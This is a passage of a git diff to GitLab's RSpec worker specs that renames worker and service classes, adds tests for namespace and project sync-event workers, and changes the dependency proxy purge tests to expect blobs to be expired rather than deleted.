CreateCommitSignatureWorker do let(:type) { :PGP } it 'performs a single query for commit signatures' do - expect(GpgSignature).to receive(:by_commit_sha).with(commit_shas).once.and_return([]) + expect(CommitSignatures::GpgSignature).to receive(:by_commit_sha).with(commit_shas).once.and_return([]) subject end diff --git a/spec/workers/every_sidekiq_worker_spec.rb b/spec/workers/every_sidekiq_worker_spec.rb index d00243672f9..00b6d2635a5 100644 --- a/spec/workers/every_sidekiq_worker_spec.rb +++ b/spec/workers/every_sidekiq_worker_spec.rb @@ -398,7 +398,6 @@ RSpec.describe 'Every Sidekiq worker' do 'PropagateIntegrationInheritWorker' => 3, 'PropagateIntegrationProjectWorker' => 3, 'PropagateIntegrationWorker' => 3, - 'PropagateServiceTemplateWorker' => 3, 'PurgeDependencyProxyCacheWorker' => 3, 'ReactiveCachingWorker' => 3, 'RebaseWorker' => 3, diff --git a/spec/workers/issuable_export_csv_worker_spec.rb b/spec/workers/issuable_export_csv_worker_spec.rb index bcc2420996d..a18d10ad3df 100644 --- a/spec/workers/issuable_export_csv_worker_spec.rb +++ b/spec/workers/issuable_export_csv_worker_spec.rb @@ -35,10 +35,15 @@ RSpec.describe IssuableExportCsvWorker do end context 'with params' do - let(:params) { { 'test_key' => true } } + let(:params) { { 'test_key' => true, 'not' => { 'label_name' => ['SomeLabel'] } } } - it 'converts controller string keys to symbol keys for IssuesFinder' do - expect(IssuesFinder).to receive(:new).with(user, hash_including(test_key: true)).and_call_original + it 'allows symbol access for IssuesFinder' do + expect(IssuesFinder).to receive(:new).and_wrap_original do |method, user, params| + expect(params[:test_key]).to eq(true) + expect(params[:not][:label_name]).to eq(['SomeLabel']) + + method.call(user, params) + end subject end diff --git a/spec/workers/issue_placement_worker_spec.rb b/spec/workers/issue_placement_worker_spec.rb index 50b9d58a5b0..9b5121d98e8 100644 --- a/spec/workers/issue_placement_worker_spec.rb +++ b/spec/workers/issue_placement_worker_spec.rb @@ -35,7 +35,7 @@ RSpec.describe IssuePlacementWorker do it 'schedules rebalancing if needed' do issue_a.update!(relative_position: RelativePositioning::MAX_POSITION) - expect(IssueRebalancingWorker).to receive(:perform_async).with(nil, nil, project.group.id) + expect(Issues::RebalancingWorker).to receive(:perform_async).with(nil, nil, project.group.id) run_worker end @@ -52,7 +52,7 @@ RSpec.describe IssuePlacementWorker do .with(have_attributes(count: described_class::QUERY_LIMIT)) .and_call_original - expect(described_class).to receive(:perform_async).with(nil, project.id) + expect(Issues::PlacementWorker).to receive(:perform_async).with(nil, project.id) run_worker @@ -101,7 +101,7 @@ RSpec.describe IssuePlacementWorker do it 'anticipates the failure to place the issues, and schedules rebalancing' do allow(Issue).to receive(:move_nulls_to_end) { raise RelativePositioning::NoSpaceLeft } - expect(IssueRebalancingWorker).to receive(:perform_async).with(nil, nil, project.group.id) + expect(Issues::RebalancingWorker).to receive(:perform_async).with(nil, nil, project.group.id) expect(Gitlab::ErrorTracking) .to receive(:log_exception) .with(RelativePositioning::NoSpaceLeft, worker_arguments) diff --git a/spec/workers/issues/placement_worker_spec.rb b/spec/workers/issues/placement_worker_spec.rb index 694cdd2ef37..33fa0b31b72 100644 --- a/spec/workers/issues/placement_worker_spec.rb +++ b/spec/workers/issues/placement_worker_spec.rb @@ -35,7 +35,7 @@ RSpec.describe Issues::PlacementWorker do it 'schedules rebalancing if needed' do issue_a.update!(relative_position: RelativePositioning::MAX_POSITION) - expect(IssueRebalancingWorker).to receive(:perform_async).with(nil, nil, project.group.id) + expect(Issues::RebalancingWorker).to receive(:perform_async).with(nil, nil, project.group.id) run_worker end diff --git a/spec/workers/issues/rebalancing_worker_spec.rb b/spec/workers/issues/rebalancing_worker_spec.rb index 438edd85f66..e1c0b348a4f 100644 --- a/spec/workers/issues/rebalancing_worker_spec.rb +++ b/spec/workers/issues/rebalancing_worker_spec.rb @@ -35,6 +35,20 @@ RSpec.describe Issues::RebalancingWorker do described_class.new.perform # all arguments are nil end + + it 'does not schedule a new rebalance if it finished under 1h ago' do + container_type = arguments.second.present? ? ::Gitlab::Issues::Rebalancing::State::PROJECT : ::Gitlab::Issues::Rebalancing::State::NAMESPACE + container_id = arguments.second || arguments.third + + Gitlab::Redis::SharedState.with do |redis| + redis.set(::Gitlab::Issues::Rebalancing::State.send(:recently_finished_key, container_type, container_id), true) + end + + expect(Issues::RelativePositionRebalancingService).not_to receive(:new) + expect(Gitlab::ErrorTracking).not_to receive(:log_exception) + + described_class.new.perform(*arguments) + end end shared_examples 'safely handles non-existent ids' do diff --git a/spec/workers/issues/reschedule_stuck_issue_rebalances_worker_spec.rb b/spec/workers/issues/reschedule_stuck_issue_rebalances_worker_spec.rb index 02d1241d2ba..6723c425f34 100644 --- a/spec/workers/issues/reschedule_stuck_issue_rebalances_worker_spec.rb +++ b/spec/workers/issues/reschedule_stuck_issue_rebalances_worker_spec.rb @@ -10,15 +10,15 @@ RSpec.describe Issues::RescheduleStuckIssueRebalancesWorker, :clean_gitlab_redis describe '#perform' do it 'does not schedule a rebalance' do - expect(IssueRebalancingWorker).not_to receive(:perform_async) + expect(Issues::RebalancingWorker).not_to receive(:perform_async) worker.perform end it 'schedules a rebalance in case there are any rebalances started' do expect(::Gitlab::Issues::Rebalancing::State).to receive(:fetch_rebalancing_groups_and_projects).and_return([[group.id], [project.id]]) - expect(IssueRebalancingWorker).to receive(:bulk_perform_async).with([[nil, nil, group.id]]).once - expect(IssueRebalancingWorker).to receive(:bulk_perform_async).with([[nil, project.id, nil]]).once + expect(Issues::RebalancingWorker).to receive(:bulk_perform_async).with([[nil, nil, group.id]]).once + expect(Issues::RebalancingWorker).to receive(:bulk_perform_async).with([[nil, project.id, nil]]).once worker.perform end diff --git a/spec/workers/loose_foreign_keys/cleanup_worker_spec.rb b/spec/workers/loose_foreign_keys/cleanup_worker_spec.rb index 544be2a69a6..3c628d036ff 100644 --- a/spec/workers/loose_foreign_keys/cleanup_worker_spec.rb +++ b/spec/workers/loose_foreign_keys/cleanup_worker_spec.rb @@ -27,43 +27,40 @@ RSpec.describe LooseForeignKeys::CleanupWorker do migration.track_record_deletions(:_test_loose_fk_parent_table_2) end - let!(:parent_model_1) do - Class.new(ApplicationRecord) do - self.table_name = '_test_loose_fk_parent_table_1' - - include LooseForeignKey - - loose_foreign_key :_test_loose_fk_child_table_1_1, :parent_id, on_delete: :async_delete - loose_foreign_key :_test_loose_fk_child_table_1_2, :parent_id_with_different_column, on_delete: :async_nullify - end - end - - let!(:parent_model_2) do - Class.new(ApplicationRecord) do - self.table_name = '_test_loose_fk_parent_table_2' - - include LooseForeignKey - - loose_foreign_key :_test_loose_fk_child_table_2_1, :parent_id, on_delete: :async_delete - end - end - - let!(:child_model_1) do - Class.new(ApplicationRecord) do - self.table_name = '_test_loose_fk_child_table_1_1' - end - end - - let!(:child_model_2) do - Class.new(ApplicationRecord) do - self.table_name = '_test_loose_fk_child_table_1_2' - end - end - - let!(:child_model_3) do - Class.new(ApplicationRecord) do - self.table_name = '_test_loose_fk_child_table_2_1' - end + let(:all_loose_foreign_key_definitions) do + { + '_test_loose_fk_parent_table_1' => [ + ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new( + '_test_loose_fk_child_table_1_1', + '_test_loose_fk_parent_table_1', + { + column: 'parent_id', + on_delete: :async_delete, + gitlab_schema: :gitlab_main + } + ), + ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new( + '_test_loose_fk_child_table_1_2', + '_test_loose_fk_parent_table_1', + { + column: 'parent_id_with_different_column', + on_delete: :async_nullify, + gitlab_schema: :gitlab_main + } + ) + ], + '_test_loose_fk_parent_table_2' => [ + ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new( + '_test_loose_fk_child_table_2_1', + '_test_loose_fk_parent_table_2', + { + column: 'parent_id', + on_delete: :async_delete, + gitlab_schema: :gitlab_main + } + ) + ] + } end let(:loose_fk_parent_table_1) { table(:_test_loose_fk_parent_table_1) } @@ -87,6 +84,8 @@ RSpec.describe LooseForeignKeys::CleanupWorker do end before do + allow(Gitlab::Database::LooseForeignKeys).to receive(:definitions_by_table).and_return(all_loose_foreign_key_definitions) + parent_record_1 = loose_fk_parent_table_1.create! loose_fk_child_table_1_1.create!(parent_id: parent_record_1.id) loose_fk_child_table_1_2.create!(parent_id_with_different_column: parent_record_1.id) @@ -98,8 +97,8 @@ RSpec.describe LooseForeignKeys::CleanupWorker do parent_record_3 = loose_fk_parent_table_2.create! 5.times { loose_fk_child_table_2_1.create!(parent_id: parent_record_3.id) } - parent_model_1.delete_all - parent_model_2.delete_all + loose_fk_parent_table_1.delete_all + loose_fk_parent_table_2.delete_all end it 'cleans up all rows' do diff --git a/spec/workers/namespaces/process_sync_events_worker_spec.rb b/spec/workers/namespaces/process_sync_events_worker_spec.rb new file mode 100644 index 00000000000..59be1fffdb4 --- /dev/null +++ b/spec/workers/namespaces/process_sync_events_worker_spec.rb @@ -0,0 +1,32 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Namespaces::ProcessSyncEventsWorker do + let!(:group1) { create(:group) } + let!(:group2) { create(:group) } + let!(:group3) { create(:group) } + + include_examples 'an idempotent worker' + + describe '#perform' do + subject(:perform) { described_class.new.perform } + + before do + group2.update!(parent: group1) + group3.update!(parent: group2) + end + + it 'consumes all sync events' do + expect { perform }.to change(Namespaces::SyncEvent, :count).from(5).to(0) + end + + it 'syncs namespace hierarchy traversal ids' do + expect { perform }.to change(Ci::NamespaceMirror, :all).to contain_exactly( + an_object_having_attributes(namespace_id: group1.id, traversal_ids: [group1.id]), + an_object_having_attributes(namespace_id: group2.id, traversal_ids: [group1.id, group2.id]), + an_object_having_attributes(namespace_id: group3.id, traversal_ids: [group1.id, group2.id, group3.id]) + ) + end + end +end diff --git a/spec/workers/projects/process_sync_events_worker_spec.rb b/spec/workers/projects/process_sync_events_worker_spec.rb new file mode 100644 index 00000000000..600fbbc6b20 --- /dev/null +++ b/spec/workers/projects/process_sync_events_worker_spec.rb @@ -0,0 +1,28 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Projects::ProcessSyncEventsWorker do + let!(:group) { create(:group) } + let!(:project) { create(:project) } + + include_examples 'an idempotent worker' + + describe '#perform' do + subject(:perform) { described_class.new.perform } + + before do + project.update!(namespace: group) + end + + it 'consumes all sync events' do + expect { perform }.to change(Projects::SyncEvent, :count).from(2).to(0) + end + + it 'syncs project namespace id' do + expect { perform }.to change(Ci::ProjectMirror, :all).to contain_exactly( + an_object_having_attributes(namespace_id: group.id) + ) + end + end +end diff --git a/spec/workers/propagate_integration_worker_spec.rb b/spec/workers/propagate_integration_worker_spec.rb index 902e3206d35..030caefb833 100644 --- a/spec/workers/propagate_integration_worker_spec.rb +++ b/spec/workers/propagate_integration_worker_spec.rb @@ -18,7 +18,7 @@ RSpec.describe PropagateIntegrationWorker do end it 'calls the propagate service with the integration' do - expect(Admin::PropagateIntegrationService).to receive(:propagate).with(integration) + expect(Integrations::PropagateService).to receive(:propagate).with(integration) subject.perform(integration.id) end diff --git a/spec/workers/purge_dependency_proxy_cache_worker_spec.rb b/spec/workers/purge_dependency_proxy_cache_worker_spec.rb index 393745958be..b928104fb58 100644 --- a/spec/workers/purge_dependency_proxy_cache_worker_spec.rb +++ b/spec/workers/purge_dependency_proxy_cache_worker_spec.rb @@ -4,18 +4,18 @@ require 'spec_helper' RSpec.describe PurgeDependencyProxyCacheWorker do let_it_be(:user) { create(:admin) } - let_it_be(:blob) { create(:dependency_proxy_blob )} - let_it_be(:group, reload: true) { blob.group } - let_it_be(:manifest) { create(:dependency_proxy_manifest, group: group )} + let_it_be_with_refind(:blob) { create(:dependency_proxy_blob )} + let_it_be_with_reload(:group) { blob.group } + let_it_be_with_refind(:manifest) { create(:dependency_proxy_manifest, group: group )} let_it_be(:group_id) { group.id } subject { described_class.new.perform(user.id, group_id) } describe '#perform' do - shared_examples 'not removing blobs and manifests' do - it 'does not remove blobs and manifests', :aggregate_failures do - expect { subject }.not_to change { group.dependency_proxy_blobs.size } - expect { subject }.not_to change { group.dependency_proxy_manifests.size } + shared_examples 'not expiring blobs and manifests' do + it 'does not expire blobs and manifests', :aggregate_failures do + expect { subject }.not_to change { blob.status } + expect { subject }.not_to change { manifest.status } expect(subject).to be_nil end end @@ -25,39 +25,36 @@ RSpec.describe PurgeDependencyProxyCacheWorker do include_examples 'an idempotent worker' do let(:job_args) { [user.id, group_id] } - it 'deletes the blobs and returns ok', :aggregate_failures do - expect(group.dependency_proxy_blobs.size).to eq(1) - expect(group.dependency_proxy_manifests.size).to eq(1) - + it 'expires the blobs and returns ok', :aggregate_failures do subject - expect(group.dependency_proxy_blobs.size).to eq(0) - expect(group.dependency_proxy_manifests.size).to eq(0) + expect(blob).to be_expired + expect(manifest).to be_expired end end end context 'when admin mode is disabled' do - it_behaves_like 'not removing blobs and manifests' + it_behaves_like 'not expiring blobs and manifests' end end context 'a non-admin user' do let(:user) { create(:user) } - it_behaves_like 'not removing blobs and manifests' + it_behaves_like 'not expiring blobs and manifests' end context 'an invalid user id' do let(:user) { double('User', id: 99999 ) } - it_behaves_like 'not removing blobs and manifests' + it_behaves_like 'not expiring blobs and manifests' end context 'an invalid group' do let(:group_id) { 99999 } - it_behaves_like 'not removing blobs and manifests' + it_behaves_like 'not expiring blobs and manifests' end end end diff --git a/spec/workers/todos_destroyer/private_features_worker_spec.rb b/spec/workers/todos_destroyer/private_features_worker_spec.rb index f346a004670..88d9be051d0 100644 --- a/spec/workers/todos_destroyer/private_features_worker_spec.rb +++ b/spec/workers/todos_destroyer/private_features_worker_spec.rb @@ -6,7 +6,7 @@ RSpec.describe TodosDestroyer::PrivateFeaturesWorker do it "calls the Todos::Destroy::PrivateFeaturesService with the params it was given" do service = double - expect(::Todos::Destroy::PrivateFeaturesService).to receive(:new).with(100, nil).and_return(service) + expect(::Todos::Destroy::UnauthorizedFeaturesService).to receive(:new).with(100, nil).and_return(service) expect(service).to receive(:execute) described_class.new.perform(100) |